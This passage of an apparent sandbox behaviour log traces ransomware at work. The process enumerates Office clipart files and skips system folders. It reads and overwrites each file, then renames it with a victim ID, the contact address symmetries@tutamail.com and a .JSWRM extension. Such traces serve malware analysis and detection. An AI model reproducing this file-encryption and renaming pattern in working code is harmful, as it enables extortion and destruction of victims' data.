MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.261] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.261] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.261] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0088.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0088.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0088.262] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0088.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0088.262] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.262] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232795.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232795.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232795.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0088.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0088.264] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0088.265] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf45328f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf45328f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x899c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0232797.WMF", cAlternateFileName="")) returned 1 [0088.265] lstrcmpiW (lpString1="J0232797.WMF", lpString2=".") returned 1 [0088.265] lstrcmpiW (lpString1="J0232797.WMF", lpString2="..") returned 1 [0088.265] lstrcmpiW (lpString1="J0232797.WMF", lpString2="...") returned 1 [0088.265] lstrcmpiW (lpString1="J0232797.WMF", lpString2="windows") returned -1 [0088.265] lstrcmpiW (lpString1="J0232797.WMF", lpString2="recovery") returned -1 [0088.265] lstrcmpiW (lpString1="J0232797.WMF", lpString2="perflogs") returned -1 [0088.265] lstrcmpiW (lpString1="J0232797.WMF", lpString2="documents and settings") returned 1 [0088.265] lstrcmpiW (lpString1="J0232797.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.265] lstrcmpiW (lpString1="J0232797.WMF", lpString2="system volume information") returned -1 [0088.265] lstrcmpiW (lpString1="J0232797.WMF", lpString2="msocache") returned -1 [0088.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0088.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232797.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232797.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0232797.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0088.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0088.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232797.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232797.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0232797.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0088.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0088.265] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0088.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.265] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.265] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0088.265] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232797.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232797.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.267] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=35228) returned 1 [0088.267] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.267] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8990) returned 0x24d210 [0088.267] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x8990, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x8990, lpOverlapped=0x0) returned 1 [0088.271] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.271] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x8990, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x8990, lpOverlapped=0x0) returned 1 [0088.272] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.273] CloseHandle (hObject=0x314) returned 1 [0088.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0088.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0088.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0088.273] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2476a8 [0088.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0088.273] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.274] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232797.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232797.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232797.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232797.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2476a8 | out: hHeap=0x1e0000) returned 1 [0088.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.274] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0088.274] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4de6, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0232803.WMF", cAlternateFileName="")) returned 1 [0088.275] lstrcmpiW (lpString1="J0232803.WMF", lpString2=".") returned 1 [0088.275] lstrcmpiW (lpString1="J0232803.WMF", lpString2="..") returned 1 [0088.275] lstrcmpiW (lpString1="J0232803.WMF", lpString2="...") returned 1 [0088.275] lstrcmpiW (lpString1="J0232803.WMF", lpString2="windows") returned -1 [0088.275] lstrcmpiW (lpString1="J0232803.WMF", lpString2="recovery") returned -1 [0088.275] lstrcmpiW (lpString1="J0232803.WMF", lpString2="perflogs") returned -1 [0088.275] lstrcmpiW (lpString1="J0232803.WMF", lpString2="documents and settings") returned 1 [0088.275] lstrcmpiW (lpString1="J0232803.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.275] lstrcmpiW (lpString1="J0232803.WMF", lpString2="system volume information") returned -1 [0088.275] lstrcmpiW (lpString1="J0232803.WMF", lpString2="msocache") returned -1 [0088.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0088.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232803.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232803.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0232803.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0088.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0088.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232803.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0232803.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0232803.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0088.275] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0088.275] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0088.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.275] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0088.276] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232803.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232803.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.276] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19942) returned 1 [0088.276] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.276] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4de0) returned 0x24d210 [0088.277] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4de0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4de0, lpOverlapped=0x0) returned 1 [0088.280] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.280] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4de0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4de0, lpOverlapped=0x0) returned 1 [0088.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.280] CloseHandle (hObject=0x314) returned 1 [0088.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0088.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0088.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0088.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0088.280] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0088.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0088.280] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0088.280] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232803.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232803.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0232803.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0232803.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0088.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0088.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0088.281] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xecb9a46, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xecb9a46, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xecb9a46, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x26e8, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0233512.WMF", cAlternateFileName="")) returned 1 [0088.281] lstrcmpiW (lpString1="J0233512.WMF", lpString2=".") returned 1 [0088.281] lstrcmpiW (lpString1="J0233512.WMF", lpString2="..") returned 1 [0088.281] lstrcmpiW (lpString1="J0233512.WMF", lpString2="...") returned 1 [0088.281] lstrcmpiW (lpString1="J0233512.WMF", lpString2="windows") returned -1 [0088.281] lstrcmpiW (lpString1="J0233512.WMF", lpString2="recovery") returned -1 [0088.281] lstrcmpiW (lpString1="J0233512.WMF", lpString2="perflogs") returned -1 [0088.281] lstrcmpiW (lpString1="J0233512.WMF", lpString2="documents and settings") returned 1 [0088.281] lstrcmpiW (lpString1="J0233512.WMF", lpString2="$RECYCLE.BIN") returned 1 [0088.281] lstrcmpiW (lpString1="J0233512.WMF", lpString2="system volume information") returned -1 [0088.281] lstrcmpiW (lpString1="J0233512.WMF", lpString2="msocache") returned -1 [0088.281] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0088.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0233512.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.281] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0233512.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0233512.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.281] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0088.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0088.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0233512.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0088.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0233512.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0233512.WMF", lpUsedDefaultChar=0x0) returned 12 [0088.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0088.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0088.282] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0088.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0088.282] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0088.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0088.282] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233512.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233512.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0088.282] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=9960) returned 1 [0088.282] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.282] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x26e0) returned 0x24d210 [0088.282] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x26e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x26e0, lpOverlapped=0x0) returned 1 [0088.285] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0088.285] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x26e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x26e0, lpOverlapped=0x0) returned 1 [0088.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0088.285] CloseHandle (hObject=0x314) returned 1 [0088.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0088.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0088.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0088.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0088.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0088.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0088.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0088.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0088.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0088.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0088.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0088.285] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0088.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0088.285] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0088.285] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233512.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233512.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0233512.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0233512.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0088.286] HeapFree 